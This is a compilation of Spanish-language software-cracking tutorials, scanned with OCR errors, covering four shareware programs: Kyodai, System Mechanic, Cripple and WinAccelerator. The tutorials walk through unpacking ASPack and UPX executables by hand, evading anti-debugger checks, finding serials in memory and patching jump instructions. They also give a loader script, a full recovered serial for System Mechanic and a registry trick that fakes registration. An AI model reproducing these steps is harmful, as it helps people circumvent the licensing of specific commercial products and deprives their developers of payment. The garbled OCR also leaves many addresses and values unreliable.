Podríamos ir al ProcDump y probar a ver que pasa, pero he decidido desempaquetarlo a mano, que es más divertido, 
practicamos un poco y de paso vemos si esta versión es igual que las anteriores. 


Desempaquetado Manual 


NOTA: Voy a hacerlo de manera totalmente práctica, no voy a entrar en explicaciones de los encabezados PE porque 
por desgracia para mi no tengo mucha idea y no quiero volver loco a nadie, quien quiera verlo con un poco más de 
profundidad, le recomiendo la magnífica traducción de Frantic, del artículo de Volatility sobre desempaquetado del 
ASPack 1.083 y os animo a buscar otros textos relacionados con el tema en el site del magnífico nu MIT_or. 


A lo que vamos, lo primero que tenemos que hacer es entrar en el programa antes de que se desempaquete para 
localizar el punto donde termina dicho desempaquetado. Para ello vamos al Symbol Loader, seleccionamos 
nuevamente el archivo kyodai.exe, le damos al icono de las ruletitas y ... ¡¡no pasa nada!!, el programa está ahí, y no ha 
saltado Softice. Que no cunda el pánico, cerramos el kyodai, y abrimos ProcDump, vamos a PE-Editor, seleccionamos 
nuestro archivo, damos a OK y nos aparece: 


PE Structure Editor 


00285001 


Ahora pulsamos Sections y aparece lo siguiente: 


Sections Editor 


Name | VitualSize__ | Virtual Ofíset_| Fiaw Size | FiawoOfíset__| Characteristics | = 
0 
DATA 00003000 D0OCDO00  00DO1O0D  O0D4CEOO  COO00040 


BSS 00004000 00000000 00000000 DODADEDO C0000040 
«data 0003000 00144000 DODODEDO DOD4DEDO Co0000040 
Hs 00001000 00147000 00000000 DOD4ECOO Co000040 
«data 00001000 00148000 00000200 DOD4ECOO C0000040 


Lo que nos interesa es la primera fila, CODE, podemos ver que en Characteristics pone CO0O0040, pues bien no nos 
interesa que ponga eso, pinchamos con en botón derecho sobre Code y en el menú seleccionamos Edit Section y 
cambiamos el C0000040 por E0000020. Con esto le estaremos diciendo al softice que esta zona contiene código 
ejecutable, y como podremos comprobar a continuación, el Symbol Loader saltará. Damos todo OK y continuamos. 


Como he dicho vamos al Symbol Loader, y cargamos kyodai.exe, damos a las ruletas, y .... ¡¡salta Softice!!, ahora no 
nos queda más que buscar el final del código del empaquetador. Vamos pulsando F10, muy atentos a los saltos (¡mp, 
jnz, JZ...), cada vez que veamos un salto que vaya para atrás, le metemos un breakpoint a la instrucción siguiente (para 
evitar los bucles), por ejemplo: 


Si tenemos: > 0068523F Jjmp 006851FC (salta para atrás) 
> 00685244 xx XXXxXxX (siguiente instrucción) 


En este caso al llegar a 0OO68523F nos pararíamos y meteríamos un breakpoint a 00685244, para meter el breakpoint yo 
he utilizado el comando 'g' del softice, luego meteríamos g 685244 daríamos a FS y listo, apareceríamos en 685244. 


Para abreviar os voy a decir donde he tenido que ponerlos: 0068528E, 006852AB, 006852EB, 006854C7, 006854DD. 
(Hacedlo vosotros mismos que no es muy largo) 


Mucha atención una vez llegados a este último punto (6854DD), que ya casi se ha terminado. Un par de F10 más y nos 
encontramos en: 


006854F3 61 POPAD 

006854F4 7508 JNZ 006854FE <--=-== Salta para abajo. 
006854F6 B801000000 MOV  EAX, 0000001 

006854fb C20C00 RET 000€ 

006854FE 6848CA4C00 PUSH 004CCA48 <---=-= Apuntamos este valor. 
00685503 C3 RET <---=-= Salimos del compresor. 


Una vez que llegamos a la altura del RET final anotamos lo siguiente en el softice: 


a eip (pulsad enter) 
jmp eip 


y pulsad un par de veces Enter. Ahora ES para salir del Softice. 


¿No notáis algo raro?, ¿dónde está el programa? Lo que pasa es que con este ultimo comando que hemos metido, 
hemos creado un bucle infinito, de forma que el programa original (kyodai.exe) está desempaquetado en memoria. 


Sólo nos queda recogerlo y ponerle un lacito, para ello vamos otra vez al ProcDump y en la tabla de tareas activas 
seleccionamos kyodai.exe, pulsamos con el botón derecho sobre ella, y seleccionamos en el menú Dump (Full), como 
en la imagen: 


WT ProcDump32 (C) 1998, 1999, 2000 G-RoM, Lorian tx Stone 


ec windows! system spool52.exe FFFO3D... 00400000 
e archivos de programa! paint shop pro 61 psp.exe FFF72601 — 00400000 
ce archivos de programa! numega!softice95loader352.exe  FFF4E7F5 00400000 
e archivos de program ay kyodai kyodai.exe 00400000 
cx urzipped: pdump32: procdump.exe Dump : 10400000 
pe 


e archivos de programa! kyodai! ... 

ec windows! systern win. dll E 

ec windows! system! comdlg32.dll E 

ec windows! systern: shell52.d1l 7E9S6BDS 7FCEOOOO 00159000 
ec windows! systernshlwapi. dll 7E9B6ED2 7OBDOODO 00044000 
cA windows! system: winspooldrwy_ 7E986B...  7FE70000 00009000 


Le ponemos un nombre, por ejemplo kyodai_des y ya está. Podemos comprobar el tamaño del nuevo archivo y ver que 
es mucho mayor que el original. 


Vamos a probar nuestro nuevo archivo, pulsamos un par de veces .... y nada. ¿Qué pasa? Espero que apuntaseis la 
dirección de antes (4CCA48) porque la necesitamos. Abrimos ProcDump, vamos a PE-Editor, seleccionamos el 
ejecutable que hemos creado antes (kyodai_des.exe) y apuntamos el valor que pone en Image Base (400000), restamos 
4CCA48-400000 = CCA48. Donde pone Entry Point le metemos esa dirección (CCA48), salimos con OK, probamos 
el ejecutable y perfecto, ahora si que está. 


Ha costado, pero ahora tendremos nuestra recompensa, jeje. 
A por el registro: 
Bueno después de descansar un poco, cambiar el CD e ir a por otra cervecita bien fresquita, vamos a por el código. 


Abrimos nuestro archivo, kyoday_des.exe, con Wdasm, buscamos en String References la frase que anotamos al 
principio y aparecemos en: 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
| :004951BA(C) 

| 

:004951E0 8D4DF8 lea ecx, dword ptr [ebp-08] 

:004951E3 A174F04C00 mov eax, dword ptr [004CF074] 

:004951E8 8B00 mov eax, dword ptr [eax] 

:004951EA 8B803C050000 mov eax, dword ptr [eax+0000053C] 


* Possible StringData Ref from Code Obj ->"Sorry, wrong password. Please " 
=>"check out if you entered the user " 
->"name and password exactly as I " 
->"gave them to you." 


:004951F0 BA64524900 mov edx, 00495264 
Buscamos un poco más arriba 004951BA y después de ver una bonita frase de exito dandonos las gracias llegamos a : 


:004951AC A174F04C00 mov eax, dword ptr [004CF074] 

:004951B1 8B00 mov eax, dword ptr [leax] 

:004951B3 E8FCCFOO0OO call 004A21B4 <- call bastante sospechoso 
:004951B8 84C0 test al, al 

:004951BA 7424 je 004951E0 


Nos ponemos sobre la llamada y pulsamos el icono Call, aparecemos obviamente en 4A21B4, seguimos mirando a ver 
que hay por ahí, hasta que llegamos a una curiosa lista de nombres, que deben ser "Los 28 Más Buscados" ;-) si por 
curiosidad miramos donde va uno de esos saltos después de un nombre, vemos aparecer la acojonante frase: "We erase 
your hard disk only for evaluation purposes...''. Joder como se las toman algunos. A lo que iba, justo antes de llegar a 
la lista aparece: 


:004A21EB E8DOC8FFFF call 0049EACO 
:004A21F0 8B45FC mov eax, dword ptr [ebp-04] <- Prepara eax 
:004A21F3 8B96802B0500 mov edx, dword ptr [esi+00052B80] <- Prepara edx 
:004A21F9 E8921CF6FF call 00403E90 <- Compara eax y edx 
:004A21FE 0F85E8020000 jne 004A24EC  <-- Si hacemos el salto pasamos la lista 
:004A2204 8B867C2B0500 mov eax, dword ptr [esi+00052B7C] 

Lista de los Más Buscados... 


Bueno, como podemos ver, si hacemos ese salto, nos saltamos los nombres, y cualquiera se da cuenta de que los 
nombres se comparan cuando has metido el código correcto, si no para que los ibas a poner. 


Sólo nos queda saber que hay en eax y en edx. Para ello ejecutamos el programa, intorducimos un nombre y un código 
y antes de dara Register, vamos a Softice y ponemos un breakpoint, por ejemplo bpx getwindowtexta, pulsamos ES, y 
damos a Register. Salta Softice, pulsamos F12 hasta llegar al código del programa; una vez allí, ponemos nuestro 
breakpoint, bpx 4A21F9 y pulsamos FS. Ahí están eax y edx, ponemos d edx y vemos nuestro código chungo, 
ponemos d eax, y aparece algo que mosquea pero que realmente es nuestro código correcto. No lo voy a poner, porque 
este no es nuestro objetivo, pero os voy a decir que el segundo caracter del código el la letra N, y el último una D. 


Metemos el código obtenido, y ya está, nos da las gracias y podemos ver arriba "Registered to Perico". 


Para volver a ser ciudadanos no registrados, sólo tenéis que volver a Register y meter un código que no sea el correcto, 
no olvidéis que nuestro objetivo sólo es aprender. Si el juego os gusta compradlo, que el tio se lo ha currao. 


Bueno, esto ha sido todo por esta vez, si hay algo que no he dejado sufientemente claro, si me queréis contar cualquier 
cosa, lo que sea, ya sabéis: kuato_thorhotmail.com 


sobre 
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Programa: System Mechanic 3.2d 


PROTECCION: Numero de Serie, Trial (30) 

Descripcion: Programa de Mantenimiento del systema. 

Dificultad: Principiante+ 

DOWNLOAD : http://www.iolo.com/sm/ 

Herramientas: Proc Dump o UnAspack, W32Dasm, FrogsICE y SICE 

CRACKER: RAZIiEL | FECHA: 07/09/2000 


INTRODUCCION 


Hola a todos, de vuelta a las andadas, soy RAZiEL, del Grupo [K-FoR], En 
esta ocasión, os traigo un programa que hace justicia a la frase “Las cosas no son lo 
que parecen ser” y si no; ya lo comprobaréis 


1.- Saludos: 


Ten en cuenta que este tutorial está realizado únicamente con fines educativos, y que 


no puedo hacerme responsable del mal uso que se pueda hacer de la información aquí 
expuesta. Si te gusta el programa CÓMPRALO. 


[| ALarAE > ] 


Nos encotramos ante un programa dedicado al mantenimiento de nuestro sistema, nos elimina las 
basuras que tenemos en el disco duro, nos arregla los accesos directos corruptos, elimina los archivos 
duplicados... En mi opinión un programa llamativo, con una interfaz bastante peculiar, pero no 
obstante, incluso lo encuentro útil. 


2.- Conociendo a la Víctima: 


Tras instalarlo; nos sale una NAG diciendo “Registra, Registra”, pero nada, no hacemos caso, aunque 
podemos ver que hay un botón para introducir el código, pasamos de ella... 


En la misma interfaz posee otro botón con “Purchase”, (esto empieza a cansarnos), así que lo pulsamos 
y aparecemos en otra ventana: 


System Mechanic Ordering Information El 


] How much does it cost? | How do | order? | 


Thank you for your interest in ¡olo technologies' System Mechanic. 


Wie sincerely hope that System Mechanic proves itself a valuable addition to your set of system 
tools. 


wWe'e put together some information to make it easy for you to purchase a licensed copy of the 
software or upgrade your existing license in a fast and convenient manner. 


What do | get if | purchase? 


- Free unlimited access to telephone, e-mail, web, and fax based technical support privileges. 
- Free upgrades to all minor updates (e.g. 3.0 to 3.1] and service releases. 
- Notification of and generous discounts on all new major version upgrades. 


- Great software created by people dedicated to providing quality products to their customers! 


Click here to purchase or upgrade instantly and securely over the Internet using a credit card. 


Show me how much System Mechanic has helped me so farl | 
Click here to enter your User ID and Serial number if you are a licensed user. | 


Please select the other tabs at the top of this screen for more information. 


Exit | 


Apreciamos un botón que dice “Si eres un usuario Registrado, mete tu Serial y tu Nombre aquí”, bien 
por aquí intentaremos atacar... 


3.- Toma de Contacto: 


Pulsamos dicho botón y otra ventana, esta vez, conserva la misma estética que la principal: 


, 
O, License System Mechanic 


uso MMS 


Serial Number: 


yA 
TOM oi 3 WE 
LGLANCEL 
a 


Introducimos nuestros datos; (Ejemplo): 


User ID: RAZiEL 
Serial Number (SN): 3131 


OK; y... nada, ventanazo; “You Have entered a bad Serial Numer...” 


Bien; ¿Dispuestos a Crackear?, pero antes... veamos si está empaquetado; Seleccionamos File 
Analizer, File Info o en un futuro próximo Flie Inspector y: 


Primera sorpresa: Empaquetado con ASpack 1.0803 


Comentario Sabroso: Si intentas crackear un programa empaquetado con ASpack, ASprotect, Shrinker o 
cualquier otro no conseguirás nada si no lo desempaquetas previamente. 


Bien, pues cogemos Proc Dump, UnASpack o cualquier otro que nos sirva para este sistema, y los 
desempaquetamos. 


Comentario Sabroso: Para los detallistas; El programa pasa de ocupar 585 Kb a 1,16 Mb. 


Una vez hecho esto; volvemos a analizarlo, para ver en que lenguaje de programación está hecho, y 
observamos que se hizo con Delphi, con lo cual recurrimos al llamado Delphi Decompiler (DeDe). Nos 
metemos en DeDe y oh!!! 

Segunda sorpresa: Dede no puede cargarlo de forma correcta, hay errores HMMM... 
Estamos desconcertados, a punto de registrarlo de forma legal, cuando decidimos echar mano a W32Dasm 


4.- Destripando... 


Con el corazón en un puño, nos metemos dentro de W32Dasm, pulsamos en el botón de cargar y... AH!!! 
Lo carga en un abrir y cerrar de ojos, algo no va bien... ¿No creéis?, bueno, pero como buenos 
crackers nos aseguramos, vamos en busca de las cadenas y cuando vamos a pulsar el botón de STR REF: 


Tercera sorpresa: No hay cadenas, el botón, está desactivado, No se Exportan Librerías tampoco... 


Estamos a punto de sufrir un auténtico desmayo por el agotamiento, nos estrujamos las neuronas, 
usamos el cerebro, y sacamos en conclusión, que el programa ha de estar encryptado de alguna forma y, 
cabe la posibilidad que este programa se desencrypte en tiempo de ejecución para validar nuestro 
serial, así que no nos queda mas opción que SICE. 


Salimos de Windows; Ejecutamos SICE y cargamos el programa; pero algo peor que todo lo anterior nos 
aguarda: 


Cuarta sorpresa: La protección ANTI-SICE del programa reinicia nuestro ordenador... 


Llegados a este punto, sacamos en conclusión, que los que han hecho este programa, realmente parecen 
buenos, así que 


hemos de evitar de alguna forma que detecte nuestro SICE, con lo cual cargamos FROGS ICE. 


Perfecto, estamos dentro; LO HEMOS CONSEGUIDO!!!!, bien, introducimos nuestro serial, (y ya 
preparados para lo peor), ponemos un BPX en HMEMCPY, (Para estar seguros de que pica), y bingo; la 
cosa va sobre ruedas, pero aún no sabemos lo que nos espera... 

Dando a F12 repetidas veces pasamos al código de nuestro “Gran Programa”, pero fijaos lo que son las 
cosas... quien iba a decir que System Mechanic iba a tener un talón de Aquiles tan grande... 


Seguid con F12 liados hasta llegar a: 4B1DE6; Y a continuación: Usad la función utilizada en SICE 
para la búsqueda de cadenas; Introducimos: 


Ss 0030:0000000 L 90000000 “RAZiEL' 


Siendo: 


S: Search (Búsqueda). 

0030:0000000 El Offset a partir del cual comenzará a buscar. 

L: Indica la longitud de la cadena. 

90000000: Longitud de la cadena que buscamos, la ponemos tan grande para que no haya 
problemas. 

“RAZiEL” : Cadena que buscamos entre ' ”' 


Y 
Bingo!, Encotramos que el SICE muestra los siguientes resultados: 


64856-ST > Cálculo de una primera parte del Serial 
64856849954863666972h 

64856-ST548-27966636 

58916-PR > Cálculo de una segunda parte del Serial 
58916243101426972757 

58946-PR014-87572796 


69807-N > Cálculo de una tercera parte del Serial 
69807354905358616467 
69807-NDO053-7646168535 > Operaciones pertinentes y Nuestro serial correcto. 


OK! Ya lo tenemos... 


5.- Finalizando... 


Que pena; ¿Verdad?, pues bien, esto para que veáis que las cosas nunca son lo que parecen, espero 


que hayáis aprendido esta valiosa lección que os servirá seguramente para seguir Crackeando. 


Introducimos nuestros Datos, Ahora sí, correctos y: 


System Mechanic EZ 


Thank you for licensing System Mechanic Industrial Edition. 


7.- Agradecimientos... 


Con esto finaliza mi tercer tutorial, espero que haya servido de ayuda a aquellos que tienen 
interés por aprender, y ya me marcho, no sin antes dar las Gracias a mi grupo [K-FoR] por su apoyo 
moral, a Txeli, Karpoff, Dek_Oin, por sus valiosos consejos, y por responder a mis consultas, al 
Profesor X; por incluirme en su compilación y a todos los que hacéis posible que este mundo sea menos 
comercial cada día. 


Ya sabéis, para alguna recomendación, consulta, o crítica constructiva: Razielltelepolis.com 


Un Abrazo a todos : RAZiEL 


Porque somos muchos... 
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Programa: Cripple 


PROTECCION: Empakado, serial name 


Descripcion: 999PPD 

Dificultad: | Principiante++ 

DOWNLOAD : A 
Herramientas: | Softice, w32dasm, Editor Hex, Process Patcher R!SC 


CRACKER: Txotxo FECHA: 22/09/2000 


INTRODUCCION | 


Primero, debemos darnos cuenta, de que se trata de un programa hecho en Visual Basic. 
Probamos con el gettype, y nos dice que está comprimido con UPX. 


AL ATAKE 


Bueno, abrimos Procdump, e intentamos descomprimirlo: 

Pero aquí, nos encontramos, con que la ventana no aparece en ningún sitio, y el procdump, se 
queda pillado, sin hacer nada durante un rato. Por lo que procederemos a descomprimirlo 
manualmente (es más divertido). Abrimos el Frogsice, para esconder el debugger. Abrimos el 
Sice, y Cargamos la librería msvbvm60.dl11, si es que no la teníamos en el winice.dat. Y le 
damos a ejecutar. Pero mira por donde, el sice no se para en ningún sitio, y el programa es 
ejecutado tal cual. NO PASA NADA. Abrimos procdump, y le damos a PE Editor, y vemos las 
secciones, y vemos que las características de la primera pone algo así: E0000080, eso 
debemos cambiarlo por E0000020. Y ahora, si nos rompera el SICE. 


Las rutinas de descompresión, hacen algo como esto: 


PUSHAD 


JMP EntryPoint del programa descomprimido 


Bueno, pues lo que tenemos que buscar es el POPAD (61). 

Por lo que al entrar en el Sice, rompe en la dirección 4070C1, entonces ponemos: s 4070C1 1 
ffffffff 61, y nos lo encuentra en 407217. Ponemos un breakpoint en esa dirección: bpx 
407217, y pulsamos CTRL+D. Nos rompe en ella, y vemos lo siguiente: 


407217 POPAD 
407218 JMP 40124C 


Este último valor es el entry point del programa descomprimido. LLegamos al jmp, y lo 
editamos con el commando a. Ponemos jmp eip. Y pulsamos CTRL+D. 


Abrimos procdump, y buscamos el programa en la lista de tareas, y con el boton derecho del 
ratón, seleccionadmos la opcion Dump (full), y lo salvamos con el nombre Dump.exe. Editamos 
ese programa con el procdump, con el PE Editor, y vemos, que la Base es 400000, simplemente, 
restamos 40124C-400000, y nos da 124C, que es el entrypoint, que tenemos que poner. 
ejecutamos el Dump.exe, y vemos que funciona perfectamente. 


Ahora, abrimos el W32DasmVB, y pulsamos STR REF, y Seleccionamos la última. 

Seleccionamos esta última, y vamos hacia atrás, hasta encontrarnos algún salto condicional 
(je XXXxXXxX/ jne XXXXXX). 

Apuntamos el Offset, y parcheamos (cambiamos el 74 por 75) con algún editor hexadecimal, 
ejecutamos, y ya está. 

El problema, es que el original está comprimido, por lo que podemos generar un Loader, que 
partxee el programa en memoria. Yo uso Risc Process Patcher, y el script correspondiente es 
el siguiente: 


T=2000: 
F=Crippleware.ex 
O=Crippleloader.exe: 
P=4034F6/74/75: 

$ 


Que genera el CripplelLoader.exe, ejecutadlo, y vereis como funciona perfectamente. -(:-D 


Este tutorial está disponible en www.geocities.com/ttxotxo Sección Cracking. 
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Programa . | WinAccelerator v1.1 


PROTECCION: | serial name 
Descripcion: Acelerador de aplicaciones y del rendimiento general del Sistema. 
Dificultad: | Principiante++ 


DOWNLOAD : http://winaccelerator.8m.com 


Herramientas: | SoftICE v3.x; IDA v4.0; W32Intro; FileInfo. 


CRACKER: LEiRUS FECHA: 22/09/2000 


INTRODUCCION 


Ya estamos aquí de nuevo, con mi 5% TUT ya en mi haber, que no es poco. 


Bueno, nuestra víctima, como reza el encabezado, se trata esta vez de WinAccelerator 
v1.1. Es un programa un tanto pobre, pero eficaz, que realiza su trabajo sin 
rechistar: acelerar el sistema para que se inician las aplicaciones más rápido. He de 
decir que su programación está plagada de errores, que vamos a ir descubriendo a lo 
largo del tutorial. 


Adelanto que este tutorial no va más allá de lo que hemos o habéis visto por ahí, 
sino que es una forma divertida de ver como un programa realiza las comprobaciones 
necesarias para protegerse a sí mismo, algo que por cierto lo hace realmente mal, 
como veremos en adelante. 


Las herramientas que pido no son nada del otro mundo. Quizás me exceda en el uso del 
W32Intro, pero es sólo con el fin de enseñar algo más acerca del IDA, el 
desensamblador al que va ir orientado este TUT. 


En fin, que ha llegado la hora de empezar 


AL ATAKE 


UN APERITIVO CON SICE 


Siempre que ataquemos un programa, lo vamos a hacer directamente por el SiCE. Al 

poner para Capturar serial's. Si no sabes cuales son (a estas alturas deberías saberlos), te 
aconsejo que te leas las crackers notes, traducidas por Txeli y que puedes encontrar en la 
compilación del ProfesorX. 


Comprobamos como el Hmemcpy de toda la vida no pica, pero el messageboxa sí lo hace. Por 
cierto, y haciendo un inciso, he de decir que según el programa, te da un "Erro" en ven de 
un "Error". Estos mierdas de programadores comerciales no hacen absolutamente nada bien. En 
fín, que le damos a F11 y anotamos la dirección desde donde se llama a messagebox. 


Con eso y con un bizcocho a las ocho, tenemos datos suficiente como para analizarlo más 
detenidamente con una lista muerta. Esta vez vamos a elegir IDA. Pero antes debemos 
comprobar que no está empaketado. 


ANALIZADO Y DESEMPAKADO: UNA RUTA ESCABROSA 


Después de comprobar que con el SiCE lo tenemos difícil, decidimos desempakarlo. Para ello 
analizamos el EXE. En este Caso, y como siempre he hecho hasta ahora, vamos a utilizar una 
estupenda herramienta que nos va a hacer el favor de analizar el archivo por nosotros. Nos 
referimos al pizpireto Filelnfo. Le damos ahí con caña y nos dice que está empaketado con 
PECompact. 


En esto que Caemos en la cuenta que ProcDump tiene en su Script este empaketador, así que 
sin más preámbulos y antes de que nos ceguemos con bits de información, ejecutamos la 
utilidad de G-RoM, y lo intentamos desempakar. Peeeeeeeeeeero, descubrimos que 
WinAccelerator se ejecuta como un VxD cualquiera, lo que quiere decir que se pone en la 
barra de tareas junto a los iconos tradicionales que allí se alojan. Por tanto, ProcDump y 
su Script fallarán estripitosamente si intentamos desempakarlo. Al menos eso fue lo que a mi 
me pasó. Pero tranquilos, aún tenemos un recurso más: W32Intro. 


¿Cómo?, ¿Que no habéis oído hablar de ese programa?. Pues se trata simplemente de un 
desempakador/desencriptador universal y que acepta multitud de formatos. Lo podéis encontrar 
en la WEB de K-FoR, en la sección Dumper's / Unpacker's de las tools. Pues bueno, realizamos 
el desempakado (no creo que deba explicar el funcionamiento del programa porque es 
extremadamente sencillo). 


Ahora ya estamos preparado para desensamblarlo con el IDA. 


LA BESTIA PARDA 

Como dije en la introducción, este tutorial estaba básicamente encaminado a explicar el 
funcionamiento del IDA, un magnífico desensamblador creado por DataRescue (interesante 
nombre). 


En primera instancia, he de decir que IDA no es como los demás desensambladore habituales 
como W32Dasm o demás. IDA utiliza una nueva tecnología que es sorprendente. Estamos hablando 
de FLIRT, una tecnología que es capaz de reconocer instrucciones de los lenguajes en que han 
sido escritos los programas a partir de un listado en ensamblador básico. Esto nos permitirá 
reconcer funciones en C como strcmp y demás. Pero bueno, de momento no vamos a utilizar esto 
para nuestro fines. Esto que he dicho es para que lo sepáis, simplemente. También os lo digo 
porque el desensamblado en IDA tarda muy poco, lo que pasa es que después viene el 
reconocimiento de las funciones, variables, estructuras, y claro, esto no se hace 
precisamente en un pis-pas, tarda lo suyo. Sin embargo, con un programa del tamaño del 
WinAccelerator, no tardaremos casi nada incluso en las máquinas más antiguas. 


Una cosa, el archivo que vamos a desensamblar es el que previamente hemos dumpeado, no el 
original. Digo esto porque seguro que hay mucho bestia por ahí intentando desensamblar un 
archivo empaketado. 


Bueno, suponemos que el IDA ya ha terminado de procesar. Ya tenemos la lista muerta. Pero 
antes, voy a explicar un poco la interfaz del IDA y como se utiliza: 


4 IDA - dumped.exe 20 E 
File Edit Jump Search View  Dptions Windows Help 


ela -[-| esos] +] |] =|2] 
2-4 + e M]Kl 0] ale olel 3/40/31] el 0] 


IDA View-A | 


5] 


SUBROUTINME 


_WinMainti6 proc near 


dword ptr 
byte ptr 
byte ptr 
byte ptr 
byte ptr 
byte ptx 
d d ptr 
dword ptr 


III III 


Compiling file 'D:YUNDERGROUNDADECOMPILERSA IDA PRO Midcronload.idc”... 

Executing function 'OnLoad'... 

IDA is analysing the input file... 

You may start to explore the input file right now. 

DAUNDERGROUNDADECOMPILERSA IDA PRO*pluginsiplugins410_v06. ple uncompatible plugin version, skipped 
Using FLIRT signature: YC v2.0/4.x25.0 runtime 


The initial autoanalys 


AU: idle [Up — (Disk: 282MB [00000880 (00401280: 


Esta es una pantalla típica del IDA. Vamos a ir explicando paso a paso Cada una de las 
secciones. 


En primer lugar, tenemos una línea, al principio del desensamblado que pone "SUBROUTINE", 
que nos indica que es el comienzo de una subrutina. Posteriormente, aparece el nombre de la 
misma, o de la función concreta que la regenta. En este caso hablamos de _WinMaint16 que la 
implementan todos los programas escritos en VisualC. Por supuesto se indica también el tipo 
de función que es: Proc Near. Posteriormente se detallan las variables y argumentos que le 
se son pasados a la función: 6 variables y 2 argumentos. También aparece y en color verde la 
referencia cruzada, desde donde es llamada esta función, vamos. Si situamos el cursor sobre 
estas líneas y hacemos doble-click, nos aparecerá un menú contextual, con un comando "Jump 
to cross reference" que nos hará aparecer una ventana en el centro justo del monitor para 
regocijo y disfrute de todos nosotros. Esta ventana nos muestra todas la referencias a esta 
función y cómo son llamadas, sin son saltos o llamadas. 


Bueno, pues de momento no voy a explicar nada más acerca del IDA. Próximamente voy a sacar 
un documento hablando específicamente del IDA, de su uso y de mucho más acerca de este 
genial desensamblador. Baste por ahora. 


BUSCANDO LA MessageBoxA 


Ahora, lo que necesitamos es buscar la llamada que se hizo a la MessageBoxA que vimos antes 


con el SiCE. Bueno, pues lo que vamos hacer es dirigirnos a la dirección de memoria que 
apuntamos anteriormente. 


Cogemos y pulsamos la tecla G o vamos al menú Search --> Jump to Address. Ponemos la 
dirección y saltamos directamente a la función desde donde se llama a la messagebox. En la 
referencia cruzada de esta función encontramos 3 referencias. Sin nos damos cuenta, resulta 
que son tres saltos condicionales. 


El primero de ellos comprueba que la longitud del serial que hemos introducido es de diez 
Caracteres. El segundo y el tercero hacen comprobaciones varias que no vienen al caso. 


Si nos vamos a SiCE y, en Cada uno de estos saltos, modificamos el flag Z en Cada ocasión, 
resulta que nos sale una ventanita de registrado. ¿Que dices?, ¿que nos hemos comido tanto 
la perola con esta mierda de programa y hemos hecho tanto como para no conseguir un serial?. 
Efectivamente, así es, pero hemos conseguido algo prodigioso: Encontrar un programa que se 
registre sin tener que modificar nada, y sin conseguir el serial. 


Os preguntaréis como determina el programa para saber si estamos registrados o no. Pues eso 
lo explico más abajo. 


FUNCIONAMIENTO TEÓRICO DEL PROGRAMA 


Básicamente, lo que hace el programita este, es comprobar que hay una entrada en el registro 
que se llame Prc y que contenga algo. Para los que quieran registrar el programa, ahí va 
como hacerlo: Abrimos el REGEDIT, y en HKEY_LOCAL _MACHINENSoftwarelAlex 
KlanovskijWWinAccelerator creamos una clave de tipo cadena que se llame Prc y que contenga 
un número cualquiera de 10 caracteres de longitud. 


El mierda del programa se limita a comprobar que existe esta clave y que su valor es una 
Cadena de 10 caracteres de longitud. Llegados a este punto, cabe preguntarse porque se 
martirizan tanto los programadores en idear un algoritmo de validación de serial's que 
después no van a utilizar. Es que de verdad, eh?. 


DESPEDIDA Y AGRADECIMIENTOS 


Siempre, siempre, siempre, he de agradecer a mis compañeros de grupo, RAZiEL y ViPER el 
apoyo recibido así como su gratitud y ánimo. Seguid siempre así, chicos, que pronto 
conseguiremos llegar a lo más alto. 


He de agradecer también por supuesto a Karpoff, por la genial página que ha conseguido 
construido y que se ha convertido en un gran referente en el mundo del cracking hispano. 
Gracias, Karpoff. 


También tiene su poquito de pastel el tan afamado y querido ProfesorX, que tenemos que dar 
las gracias por el inmenso trabajo que supone la compilación, que aunque parece ser que 
últimamente está sufriendo numerosos percances, estamos seguros de que conseguirá 
engrandecerse aún más. 


Por último, he de agradecer la visita de todos los que habéis visitado mi página y la de mi 
grupo, porque me hace muy feliz que hayamos conseguido lo que hemos conseguido. Y todavía 
queda mucho más, porque esto es sólo el principio. Gracias a todos los crackers del mundo 
por ser como sois (que profundas me han salido estas frases 8-). 
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INTRODUCCION 


Hola de nuevo a todos. He decidido hacer este tutorial del Kyodai sabiendo que ya hay suficientes por 
aburrimiento una tarde de Domingo a las 17:40 de la tarde. Y... porque este es mi primer tutorial sobre cómo 
hacer un keygen (en ASM). Asi que creo que deberíamos empezar ya. 


AL ATAKE 


Para empezar instalamos el programa con tranquilidad sabiendo que es shareware y que nos pedira una puta clave :-) 


Una vez instalado abrimos el programa y lo estudiamos un poco (joder!! que buena pinta tiene el condenado es 
chulo!!!) y miramos en el menu: Help/Register y observamos que nos pide el Nombre y número de serie. Bueno pues 
vamos a introducir los datos: 


Nombre: Mr_Burns 


Serial: 1234567890 


Le damos al "OK" y.... nos aparece una ventanita que pone "Lo siento n* incorrecto. Por favor compruebe que lo 
escribio tal y como le fue entregado". "Caguen...” pues a mi me ha molado mazo y me lo quiero quedar asi que lo voy 


a CRaCKeaR!! 


Empezare metiendole mano con el Win32Dasm y... joe!! que se me ha colgado!! Bueno no pasa nada lo voy a cargar 
en el Loader sel Soflce (SICE) y... pues tp tira!!! Pufff!! Esto me hace sospechar que este programa esta empakado!!! 


Bueno para ello usare mi querido ProcDump. Entro en el PE Editor y abro el kyo1021.exe (no el kyodai.exe!!), entro 
en Sections y observo dos cosas: 


1? En .CODE (caracteristics) aparece CO000040. Eso significa que el programa no es ejecutable!!! Y que yo sepa 
deberia tener E0000020 (ejecutable). Bueno, pues eso, lo cambiamos. 


2” Aparece una cadena por ahi que pone Aspack. Eso a mi me suena a Compresor!! 


Despues de esto lo que voy a hacer es descomprimir el programa con el Aspack, la ultima version porque este 
programa es nuevo, y... no tira!!! Eso quiere decir que no tenemos esa version. Lo que significa que habra que hacerlo 
a mano (jejeje esto se pone interesante asi que me voy a por un cafetito :-)) 


Corremos el Loader del Sice y vemos que ahora SI! que tiran esas ruletitas :-) Entramos y vemos que la direccion es un 
poco rara (5A1001) y observamos: 


PUSHAD 
CALL OOXXXXXX 


JMP OOXXXXXX 


60 
POPAD 


Esta es una tipica estructura de un fichero empacado y/ó encriptado. Lo que nosotros estamos buscando es POPAD ya 
que despues de eso el programa ya esta desempacado. Asi que adelante, a tipear F10 como cerdos hasta encontrarlo (lo 
que yo os aconsejo es que cuando veais un salto que os lleve hacia arriba introduzcais "G address siguiente al salto" 
para que no tengais que tragaros todos los bucles que hay). Despues de muchos cuelgues del SICE y de muchos F10 
encontramos un POPAD en la dirección 59E4F1. Lo que ahora haremos es S 59E4F1 L FFFFFF 61 (61 = POPAD en 
hexadecimal) y apretamos FS. Si sales del Sice y entras en el programa ALELUYA!!! la instruccion encontrada es la 
correcta, en caso contrario, deberas buscar otro POPAD y realizar la misma operacion :-( 


Bueno coninuamos y vemos que despues de varios tipeos de F10 aparece un RET en 59E501 y que ese RET nos lleva 
